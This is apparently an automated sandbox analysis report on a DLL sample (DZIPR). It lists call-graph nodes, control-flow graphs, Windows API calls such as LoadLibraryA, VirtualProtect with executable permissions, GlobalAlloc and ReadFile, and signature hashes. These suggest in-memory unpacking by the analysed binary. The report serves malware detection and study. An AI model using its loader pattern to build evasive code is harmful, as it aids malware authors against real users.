20444->20445 20445->20434 20454 6fe35c74 20446->20454 20450 6fe3a65d 20449->20450 20451 6fe34ac8 _realloc 71 API calls 20450->20451 20452 6fe3a69c 20450->20452 20453 6fe3a67d Sleep 20450->20453 20451->20450 20452->20438 20453->20450 20457 6fe3a83a LeaveCriticalSection 20454->20457 20456 6fe344b3 20456->20422 20457->20456 20459 6fe35d4f ___DllMainCRTStartup 20458->20459 20460 6fe3a914 __lock 62 API calls 20459->20460 20461 6fe35d56 20460->20461 20463 6fe3a033 __decode_pointer 6 API calls 20461->20463 20467 6fe35e0f __initterm 20461->20467 20465 6fe35d8d 20463->20465 20465->20467 20469 6fe3a033 __decode_pointer 6 API calls 20465->20469 20466 6fe35e57 ___DllMainCRTStartup 20466->20088 20475 6fe35e5a 20467->20475 20473 6fe35da2 20469->20473 20470 6fe35e4e 20471 6fe35c53 _malloc 3 API calls 20470->20471 20471->20466 20472 6fe3a02a 6 API calls __init_pointers 20472->20473 20473->20467 20473->20472 20474 6fe3a033 6 API calls __decode_pointer 20473->20474 20474->20473 20476 6fe35e60 20475->20476 20477 6fe35e3b 20475->20477 20480 6fe3a83a LeaveCriticalSection 20476->20480 20477->20466 20479 6fe3a83a LeaveCriticalSection 20477->20479 20479->20470 20480->20477 20482 6fe3a2a5 ___DllMainCRTStartup 20481->20482 20483 6fe3a2bd 20482->20483 20484 6fe3a3a7 ___DllMainCRTStartup 20482->20484 20485 6fe34618 __crtGetStringTypeA_stat 62 API calls 20482->20485 20486 6fe3a2cb 20483->20486 20487 6fe34618 __crtGetStringTypeA_stat 62 API calls 20483->20487 20484->20090 20485->20483 20488 6fe3a2d9 20486->20488 20489 6fe34618 __crtGetStringTypeA_stat 62 API calls 20486->20489 20487->20486 20490 6fe3a2e7 20488->20490 20492 6fe34618 __crtGetStringTypeA_stat 62 API calls 20488->20492 20489->20488 20491 6fe3a2f5 20490->20491 20493 6fe34618 __crtGetStringTypeA_stat 62 API calls 20490->20493 20494 6fe3a303 20491->20494 20495 6fe34618 __crtGetStringTypeA_stat 62 API calls 20491->20495 20492->20490 20493->20491 20496 6fe3a311 20494->20496 20497 6fe34618 __crtGetStringTypeA_stat 62 API calls 20494->20497 20495->20494 20498 6fe3a322 20496->20498 20500 6fe34618 __crtGetStringTypeA_stat 62 API calls 20496->20500 20497->20496 20499 6fe3a914 __lock 62 API calls 20498->20499 20501 6fe3a32a 20499->20501 20500->20498 20502 6fe3a34f 20501->20502 20503 6fe3a336 InterlockedDecrement 20501->20503 20517 6fe3a3b3 20502->20517 20503->20502 20504 6fe3a341 20503->20504 20504->20502 20507 6fe34618 __crtGetStringTypeA_stat 62 API calls 20504->20507 20507->20502 20508 6fe3a914 __lock 62 API calls 20509 6fe3a363 20508->20509 20510 6fe3a394 20509->20510 20512 6fe404a3 ___removelocaleref 8 API calls 20509->20512 20520 6fe3a3bf 20510->20520 20515 6fe3a378 20512->20515 20514 6fe34618 __crtGetStringTypeA_stat 62 API calls 20514->20484 20515->20510 20516 6fe402cb ___freetlocinfo 62 API calls 20515->20516 20516->20510 20523 6fe3a83a LeaveCriticalSection 20517->20523 20519 6fe3a35c 20519->20508 20524 6fe3a83a LeaveCriticalSection 20520->20524 20522 6fe3a3a1 20522->20514 20523->20519 20524->20522

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 25 6fe263f0-6fe263f8 26 6fe263fe-6fe2640f 25->26 27 6fe2649c-6fe264c1 25->27 30 6fe26413-6fe2641e 26->30 28 6fe264c3 27->28 29 6fe26524 27->29 31 6fe264c5-6fe264cb 28->31 34 6fe26526-6fe26551 29->34 32 6fe26420 30->32 33 6fe26481 30->33 31->31 36 6fe264cd-6fe264cf 31->36 37 6fe26422-6fe26427 32->37 35 6fe26483-6fe26487 33->35 38 6fe265f1 34->38 39 6fe26557-6fe26568 34->39 40 6fe2671b-6fe2671e 35->40 41 6fe2648d-6fe26492 35->41 36->29 42 6fe264d1-6fe264d7 36->42 37->37 44 6fe26429-6fe2642b 37->44 43 6fe265f3-6fe26661 LoadLibraryA VirtualProtect call 6fe267f8 VirtualProtect 38->43 45 6fe2656c-6fe26577 39->45 41->30 46 6fe26498 41->46 47 6fe266f0 42->47 48 6fe264dd-6fe264e6 42->48 62 6fe26682-6fe266a9 43->62 63 6fe26663 43->63 44->33 50 6fe2642d-6fe26433 44->50 51 6fe265da 45->51 52 6fe26579 45->52 46->27 54 6fe264ea-6fe26501 48->54 56 6fe266e6 50->56 57 6fe26439-6fe26443 50->57 53 6fe265dc-6fe265e0 51->53 58 6fe2657b-6fe26580 52->58 59 6fe265e6-6fe265eb 53->59 60 6fe26704-6fe26716 53->60 54->54 61 6fe26503-6fe26513 54->61 67 6fe266fa 56->67 64 6fe26447-6fe2645e 57->64 58->58 65 6fe26582-6fe26584 58->65 59->38 59->45 60->43 61->34 68 6fe26515-6fe26522 61->68 69 6fe26667-6fe26680 63->69 64->64 70 6fe26460-6fe26471 64->70 65->51 66 6fe26586-6fe2658c 65->66 66->67 71 6fe26592-6fe2659c 66->71 67->60 68->34 69->62 69->69 70->35 72 6fe26473-6fe2647f 70->72 74 6fe265a0-6fe265b7 71->74 72->35 74->74 75 6fe265b9-6fe265ca 74->75 75->53 76 6fe265cc-6fe265d8 75->76 76->53
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00000000), ref: 6FE26602
                                        • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FE2663B
                                        • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FE26654
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 895956442-0
                                        • Opcode ID: 7253e9b7ac9716459256c511a60541d454dd8fb665e8bbae8a1950b711758626
                                        • Instruction ID: a82c5b1238fd1fcb3ac45d0f4ad6056b562a23a95cbde2921993ad50e5e934cc
                                        • Opcode Fuzzy Hash: 7253e9b7ac9716459256c511a60541d454dd8fb665e8bbae8a1950b711758626
                                        • Instruction Fuzzy Hash: 65A1CE305087558FC315CF68C88062AFBE2BFCA308F198A6EE8D597356E735E955CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 105 6fe25ca0-6fe25d95 call 6fe2af9c * 2 call 6fe2afc3 * 2 call 6fe264e0 GetPEB 116 6fe25d97 105->116 117 6fe25de4 105->117 119 6fe25d99-6fe25da3 116->119 118 6fe25de6-6fe25e1d 117->118 120 6fe25e23-6fe25e3c 118->120 121 6fe25eba-6fe25f0c GlobalAlloc 118->121 122 6fe25dd6-6fe25dd8 119->122 123 6fe25da5-6fe25dab 119->123 126 6fe25e40-6fe25e4e 120->126 127 6fe25f12-6fe25f2b 121->127 128 6fe25fad 121->128 124 6fe267e1-6fe267e4 122->124 125 6fe25dde-6fe25de2 122->125 129 6fe25dae-6fe25db5 123->129 124->118 125->117 125->119 132 6fe25ea3 126->132 133 6fe25e50 126->133 131 6fe25f2f-6fe25f3d 127->131 130 6fe25faf-6fe25fce 128->130 134 6fe25dc1-6fe25dcd 129->134 135 6fe25db7-6fe25dbd 129->135 143 6fe25fd0 130->143 144 6fe25fe7-6fe25fea 130->144 140 6fe25f92 131->140 141 6fe25f3f 131->141 138 6fe25ea5-6fe25ea9 132->138 142 6fe25e52-6fe25e58 133->142 134->129 137 6fe25dcf-6fe25dd3 134->137 135->134 136 6fe25dbf 135->136 136->134 137->122 146 6fe267c3-6fe267dc 138->146 147 6fe25eaf-6fe25eb4 138->147 145 6fe25f94-6fe25f98 140->145 148 6fe25f41-6fe25f47 141->148 142->142 149 6fe25e5a-6fe25e5c 142->149 150 6fe25fd2-6fe25fe5 143->150 151 6fe25ffe-6fe26038 144->151 152 6fe25fec 144->152 153 6fe267a5-6fe267be 145->153 154 6fe25f9e-6fe25fa3 145->154 147->126 156 6fe25eb6 147->156 148->148 157 6fe25f49-6fe25f4b 148->157 149->132 158 6fe25e5e-6fe25e64 149->158 150->144 150->150 160 6fe260d9 151->160 161 6fe2603e-6fe26057 151->161 159 6fe25fee-6fe25ffc 152->159 153->130 154->131 162 6fe25fa5-6fe25fa9 154->162 156->121 157->140 163 6fe25f4d-6fe25f53 157->163 164 6fe266aa-6fe266af 158->164 165 6fe25e6a-6fe25e6e 158->165 159->151 159->159 167 6fe260db-6fe260ef 160->167 168 6fe2605b-6fe26069 161->168 162->128 170 6fe266b4 163->170 171 6fe25f59-6fe25f5d 163->171 169 6fe25e90-6fe25e95 164->169 166 6fe25e70-6fe25e86 165->166 166->166 173 6fe25e88-6fe25e8c 166->173 175 6fe2606b 168->175 176 6fe260be 168->176 169->138 174 6fe25e97-6fe25ea1 169->174 177 6fe266be 170->177 172 6fe25f5f-6fe25f75 171->172 172->172 178 6fe25f77-6fe25f84 172->178 173->169 174->138 179 6fe2606d-6fe26073 175->179 180 6fe260c0-6fe260c4 176->180 182 6fe26788-6fe267a0 177->182 178->145 183 6fe25f86-6fe25f90 178->183 179->179 184 6fe26075-6fe26077 179->184 181 6fe260ca-6fe260cf 180->181 180->182 181->168 185 6fe260d1-6fe260d5 181->185 182->167 183->145 184->176 186 6fe26079-6fe2607f 184->186 185->160 186->177 187 6fe26085-6fe26089 186->187 188 6fe2608b-6fe260a1 187->188 188->188 189 6fe260a3-6fe260b0 188->189 189->180 190 6fe260b2-6fe260bc 189->190 190->180
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_memset
                                        • String ID:
                                        • API String ID: 2997193564-0
                                        • Opcode ID: 9d59af48069228862bbbe6b4610c32b28d877bc65dcb4fbbcd5a9e69ccdc2a8e
                                        • Instruction ID: af97914aadcc4280111d6371c1eb7d79dcbffd2a08686340ae198b3fea0c9522
                                        • Opcode Fuzzy Hash: 9d59af48069228862bbbe6b4610c32b28d877bc65dcb4fbbcd5a9e69ccdc2a8e
                                        • Instruction Fuzzy Hash: 81E15C709087058FC728CF59C59062AFBE2FF89318F65892EE89987355EB30B955CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 351 6fe25e70-6fe25e86 351->351 352 6fe25e88-6fe25e8c 351->352 353 6fe25e90-6fe25e95 352->353 354 6fe25e97-6fe25ea1 353->354 355 6fe25ea5-6fe25ea9 353->355 354->355 356 6fe267c3-6fe267dc 355->356 357 6fe25eaf-6fe25eb4 355->357 359 6fe25e40-6fe25e4e 357->359 360 6fe25eb6-6fe25f0c GlobalAlloc 357->360 362 6fe25ea3 359->362 363 6fe25e50 359->363 364 6fe25f12-6fe25f2b 360->364 365 6fe25fad 360->365 362->355 366 6fe25e52-6fe25e58 363->366 368 6fe25f2f-6fe25f3d 364->368 367 6fe25faf-6fe25fce 365->367 366->366 369 6fe25e5a-6fe25e5c 366->369 374 6fe25fd0 367->374 375 6fe25fe7-6fe25fea 367->375 371 6fe25f92 368->371 372 6fe25f3f 368->372 369->362 373 6fe25e5e-6fe25e64 369->373 376 6fe25f94-6fe25f98 371->376 377 6fe25f41-6fe25f47 372->377 378 6fe266aa-6fe266af 373->378 379 6fe25e6a-6fe25e6e 373->379 380 6fe25fd2-6fe25fe5 374->380 381 6fe25ffe-6fe26038 375->381 382 6fe25fec 375->382 383 6fe267a5-6fe267be 376->383 384 6fe25f9e-6fe25fa3 376->384 377->377 385 6fe25f49-6fe25f4b 377->385 378->353 379->351 380->375 380->380 387 6fe260d9 381->387 388 6fe2603e-6fe26057 381->388 386 6fe25fee-6fe25ffc 382->386 383->367 384->368 389 6fe25fa5-6fe25fa9 384->389 385->371 390 6fe25f4d-6fe25f53 385->390 386->381 386->386 391 6fe260db-6fe260ef 387->391 392 6fe2605b-6fe26069 388->392 389->365 393 6fe266b4 390->393 394 6fe25f59-6fe25f5d 390->394 396 6fe2606b 392->396 397 6fe260be 392->397 398 6fe266be 393->398 395 6fe25f5f-6fe25f75 394->395 395->395 399 6fe25f77-6fe25f84 395->399 400 6fe2606d-6fe26073 396->400 401 6fe260c0-6fe260c4 397->401 403 6fe26788-6fe267a0 398->403 399->376 404 6fe25f86-6fe25f90 399->404 400->400 405 6fe26075-6fe26077 400->405 402 6fe260ca-6fe260cf 401->402 401->403 402->392 406 6fe260d1-6fe260d5 402->406 403->391 404->376 405->397 407 6fe26079-6fe2607f 405->407 406->387 407->398 408 6fe26085-6fe26089 407->408 409 6fe2608b-6fe260a1 408->409 409->409 410 6fe260a3-6fe260b0 409->410 410->401 411 6fe260b2-6fe260bc 410->411 411->401
                                        APIs
                                        • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FE25ECA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AllocGlobal
                                        • String ID:
                                        • API String ID: 3761449716-0
                                        • Opcode ID: bb5d16e43918b8784b3960748059a33e8f1eb1ae9b2918fd10d93b643f9e9097
                                        • Instruction ID: 15f61d435afbe232d9747f584548818ddbdd859de91eda1a08d068dad014a482
                                        • Opcode Fuzzy Hash: bb5d16e43918b8784b3960748059a33e8f1eb1ae9b2918fd10d93b643f9e9097
                                        • Instruction Fuzzy Hash: 1CA1A5706087168FC718DF1CC59062AFBE2BF8A304F24856DE89687355E771F965CB81

                                        Control-flow Graph

                                        APIs
                                        • EnterCriticalSection.KERNEL32(6FE532EC,?,?,?,6FE532D0,6FE532D0,?,6FE2C0A4,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2BC61
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,6FE532D0,6FE532D0,?,6FE2C0A4,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2BCB7
                                        • GlobalHandle.KERNEL32(00F5ADF0), ref: 6FE2BCC0
                                        • GlobalUnlock.KERNEL32(00000000), ref: 6FE2BCCA
                                        • GlobalReAlloc.KERNEL32(6FE4C168,00000000,00002002), ref: 6FE2BCE3
                                        • GlobalHandle.KERNEL32(00F5ADF0), ref: 6FE2BCF5
                                        • GlobalLock.KERNEL32(00000000), ref: 6FE2BCFC
                                        • LeaveCriticalSection.KERNEL32(?,?,?,6FE532D0,6FE532D0,?,6FE2C0A4,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2BD05
                                        • GlobalLock.KERNEL32(00000000), ref: 6FE2BD11
                                        • _memset.LIBCMT ref: 6FE2BD2B
                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 6FE2BD59
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                        • String ID:
                                        • API String ID: 496899490-0
                                        • Opcode ID: 10937d0a5cf0c58fe0edf493b454a81fbece2a7c540e64e8f408f60e9e51999e
                                        • Instruction ID: fcafb2dcdc690aa4161da37a671b8a0133f9a1a3decb596ab59a348fffa09410
                                        • Opcode Fuzzy Hash: 10937d0a5cf0c58fe0edf493b454a81fbece2a7c540e64e8f408f60e9e51999e
                                        • Instruction Fuzzy Hash: 8F31C171A04B04AFDB20AF68C849A5A7FF9FF45314F24492EE552D7250EB30F955CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 77 6fe264e0-6fe264e8 78 6fe264ea-6fe26501 77->78 78->78 79 6fe26503-6fe26513 78->79 80 6fe26526-6fe26551 79->80 81 6fe26515-6fe26522 79->81 82 6fe265f1 80->82 83 6fe26557-6fe26568 80->83 81->80 84 6fe265f3-6fe26661 LoadLibraryA VirtualProtect call 6fe267f8 VirtualProtect 82->84 85 6fe2656c-6fe26577 83->85 94 6fe26682-6fe266a9 84->94 95 6fe26663 84->95 87 6fe265da 85->87 88 6fe26579 85->88 89 6fe265dc-6fe265e0 87->89 91 6fe2657b-6fe26580 88->91 92 6fe265e6-6fe265eb 89->92 93 6fe26704-6fe26716 89->93 91->91 96 6fe26582-6fe26584 91->96 92->82 92->85 93->84 98 6fe26667-6fe26680 95->98 96->87 97 6fe26586-6fe2658c 96->97 99 6fe26592-6fe2659c 97->99 100 6fe266fa 97->100 98->94 98->98 102 6fe265a0-6fe265b7 99->102 100->93 102->102 103 6fe265b9-6fe265ca 102->103 103->89 104 6fe265cc-6fe265d8 103->104 104->89
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00000000), ref: 6FE26602
                                        • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FE2663B
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LibraryLoadProtectVirtual
                                        • String ID:
                                        • API String ID: 3279857687-0
                                        • Opcode ID: b74788dd3d980e7f9a8d623bf223e7e5ce129996ea4cbea3c8c0aaf1b6a5a65e
                                        • Instruction ID: 5e3fe8f6d3b0cca1386ae55234cca21305d55ce1a1317350feeab647f6195b36
                                        • Opcode Fuzzy Hash: b74788dd3d980e7f9a8d623bf223e7e5ce129996ea4cbea3c8c0aaf1b6a5a65e
                                        • Instruction Fuzzy Hash: 2C51F4306083558FC715CF58C88062AFFE6BFCA308F298A6DE88547316D631F916CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 191 6fe26750-6fe26762 ReadFile 193 6fe261f0-6fe26207 191->193 194 6fe2630a-6fe26323 191->194 195 6fe26325-6fe26329 194->195 196 6fe2634d-6fe26368 194->196 197 6fe26738 195->197 198 6fe2632f 195->198 199 6fe2636a 196->199 200 6fe263cb 196->200 197->191 202 6fe26331-6fe2633c 198->202 203 6fe2636c-6fe26372 199->203 204 6fe263cd-6fe263ee 200->204 202->202 205 6fe2633e-6fe26347 202->205 203->203 206 6fe26374-6fe26376 203->206 207 6fe266dc 204->207 205->196 208 6fe26349 205->208 206->200 209 6fe26378-6fe2637e 206->209 207->197 208->196 209->207 210 6fe26384-6fe2638d 209->210 211 6fe26391-6fe263a8 210->211 211->211 212 6fe263aa-6fe263ba 211->212 212->204 213 6fe263bc-6fe263c9 212->213 213->204
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FE4C168), ref: 6FE26300
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 6efe59a72388a5c63ad578e8dea4e1ff7c65a28ea986ac7a95576acfa99ad0ec
                                        • Instruction ID: 46261b7176f99aa9d032b13b55b782d36fa5880f72e1ed8edd74238fab5bd710
                                        • Opcode Fuzzy Hash: 6efe59a72388a5c63ad578e8dea4e1ff7c65a28ea986ac7a95576acfa99ad0ec
                                        • Instruction Fuzzy Hash: 8D41B4316087058FC718CF19C88067ABBE6FFC6314F29866DE88997355E635F8658B81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 214 6fe262d0-6fe262d5 215 6fe26742-6fe2674e 214->215 216 6fe262db-6fe262e0 214->216 217 6fe262e2-6fe262f1 216->217 218 6fe2626d-6fe2627b 216->218 224 6fe262f3-6fe26304 ReadFile 217->224 219 6fe262cf 218->219 220 6fe2627d 218->220 223 6fe262d1-6fe262d5 219->223 222 6fe2627f-6fe26284 220->222 222->222 225 6fe26286-6fe26288 222->225 223->215 223->216 226 6fe261f0-6fe26207 224->226 227 6fe2630a-6fe26323 224->227 225->219 228 6fe2628a-6fe26290 225->228 229 6fe26325-6fe26329 227->229 230 6fe2634d-6fe26368 227->230 235 6fe266d2 228->235 236 6fe26296-6fe2629a 228->236 231 6fe26738-6fe26762 229->231 232 6fe2632f 229->232 233 6fe2636a 230->233 234 6fe263cb 230->234 231->224 238 6fe26331-6fe2633c 232->238 239 6fe2636c-6fe26372 233->239 241 6fe263cd-6fe263ee 234->241 235->215 240 6fe2629c-6fe262b2 236->240 238->238 242 6fe2633e-6fe26347 238->242 239->239 244 6fe26374-6fe26376 239->244 240->240 245 6fe262b4-6fe262c1 240->245 246 6fe266dc 241->246 242->230 247 6fe26349 242->247 244->234 248 6fe26378-6fe2637e 244->248 245->223 249 6fe262c3-6fe262cd 245->249 246->231 247->230 248->246 250 6fe26384-6fe2638d 248->250 249->223 251 6fe26391-6fe263a8 250->251 251->251 252 6fe263aa-6fe263ba 251->252 252->241 253 6fe263bc-6fe263c9 252->253 253->241
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FE4C168), ref: 6FE26300
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 91dd216fdbb89bb69ae6922028add6641c3c3f33789a833f1dbf4794981a708d
                                        • Instruction ID: ff745d4caed79522ba0c407aaeb0f601b8b9c1faca799c592199dde62dfd8f40
                                        • Opcode Fuzzy Hash: 91dd216fdbb89bb69ae6922028add6641c3c3f33789a833f1dbf4794981a708d
                                        • Instruction Fuzzy Hash: 5B31D331A087058FC718CF19C88066ABBE2FFC6314F298A6DE89557356E735F865CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 254 6fe2c050-6fe2c068 call 6fe350c9 257 6fe2c06a call 6fe26dc1 254->257 258 6fe2c06f-6fe2c072 254->258 257->258 260 6fe2c074-6fe2c07c 258->260 261 6fe2c0aa-6fe2c0bb call 6fe2ba5b 258->261 262 6fe2c07e-6fe2c09d call 6fe2bd66 260->262 263 6fe2c09f call 6fe2bc4e 260->263 270 6fe2c0d0-6fe2c0d7 call 6fe351a1 261->270 271 6fe2c0bd-6fe2c0cb call 6fe2be0d 261->271 262->257 262->263 269 6fe2c0a4-6fe2c0a8 263->269 269->257 269->261 271->270
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6FE2C057
                                          • Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
                                          • Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: H_prolog3$Exception@8Throw
                                        • String ID:
                                        • API String ID: 2489616738-0
                                        • Opcode ID: d8fed6d9db459f6d5701d1ead1e152fa941d082e5187eaa0e68aacb74495362a
                                        • Instruction ID: d30681a4f924283f569b414f56252f942dbb818612d4d7aa57cd701f73366110
                                        • Opcode Fuzzy Hash: d8fed6d9db459f6d5701d1ead1e152fa941d082e5187eaa0e68aacb74495362a
                                        • Instruction Fuzzy Hash: 9E014834A00A169BDB18AF69C815A697EE3AF82329B30842DE5558A3D0EF32D9518B51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
